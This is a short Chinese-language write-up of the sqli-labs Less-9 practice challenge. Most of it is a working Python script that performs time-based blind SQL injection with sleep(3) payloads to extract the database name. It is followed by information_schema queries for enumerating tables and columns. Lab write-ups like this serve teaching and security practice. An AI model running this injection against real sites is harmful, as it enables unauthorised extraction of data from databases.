less-9
观察页面，只有一个返回值“You are in…”
即使 id 的值错误也没有其他回显
因此采用时间盲注
import requests
import string
import time
ip = "http://a86ecc66-5929-4b0d-b39c-842de53f0121.node4.buuoj.cn/Less-9/?id="
# Expression whose value is read back one character at a time.
command = "database()"
result = ""

# Indentation was lost in the paste this listing came from; the nesting
# below is a reconstruction (the running result is printed only on a match).
# Each probe asks the server to sleep(3) when one character of `command`
# equals the guessed letter, so a slow response is read as "match"; the
# response body is never inspected, the timing is the only oracle.
# From the server side this pattern is easy to spot: a burst of GET
# requests whose query string contains `sleep(` and whose latencies
# cluster at roughly the sleep duration.
for position in range(1, 100):
    for guess in string.ascii_letters:
        probe = ip + f"1' and if(ord(substr(({command}),{position},1))=ord('{guess}'),sleep(3),4) %23"
        print(probe)
        started = time.time()
        requests.get(url=probe)
        elapsed = time.time() - started
        # The fast branch of the original was a no-op; only a delay of at
        # least the sleep duration counts as a hit.
        if elapsed >= 3:
            result += guess
            print(f"result:{result}")
        # Retained from the original: a guess drawn from ascii_letters can
        # never have code point 127, so this exit is unreachable and both
        # loops always run to completion.
        if ord(guess) == 127:
            raise SystemExit(0)
-- Presumably the later values placed in the `command` slot of the script
-- above, one per step; the last line looks like a template with the table
-- name still to be filled in — confirm against the author's notes.
select table_name from information_schema.tables where table_schema='security' limit 0,1
select column_name from information_schema.columns where table_schema='security' limit 0,1
select id from table_name